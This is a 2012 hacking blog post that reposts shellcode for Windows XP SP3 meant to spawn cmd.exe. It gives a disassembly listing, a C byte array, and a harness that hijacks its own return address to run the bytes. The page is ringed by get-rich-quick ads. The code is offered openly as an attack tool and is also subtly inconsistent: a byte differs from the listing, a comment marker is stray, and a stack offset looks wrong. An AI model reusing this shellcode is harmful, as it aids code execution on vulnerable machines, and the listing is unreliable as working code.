BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

LR
 

Monday, January 30, 2012

windows/XP sp3 (ENG) cmd.exe Sellcode

Posted by BLACK BURN at 11:03 PM 0 comments

Code:
# Title : windows/XP sp3 (ENG) cmd.exe Sellcode
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform : winDows xp SP3      |  tESTED IN WINDWOS XP SP 3 work
# Type : SHELL CODe WINDWOS
# WARNING : i teste in windows Xp sp3 (ENG) not windwos 7 or windwos sp2 :( thank you ....
###


00402000   8BEC             MOV EBP,ESP
00402002   33FF             XOR EDI,EDI
00402004   57               PUSH EDI
00402005   C645 FC 63       MOV BYTE PTR SS:[EBP-4],63
00402009   C645 FD 6D       MOV BYTE PTR SS:[EBP-3],6D
0040200D   C645 FE 64       MOV BYTE PTR SS:[EBP-2],64
00402011   C645 F8 01       MOV BYTE PTR SS:[EBP-8],1
00402015   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-3]
00402018   50               PUSH EAX
00402019   B8 C793BF77      MOV EAX,msvcrt.system
0040201E   FFD0             CALL EAX
*/

#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC4\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+3;
printf("Shellcode print is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

©2011, copyright BLACK BURN

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 

7 Years Earning Experience

LR

The Earning Source You Can Trust

LR
 
Site Details

BLACK BURN Moonlit | © 2012 Design by BLACK BURN MOONLIT. Supported by Make Money Easily, 100% Grunted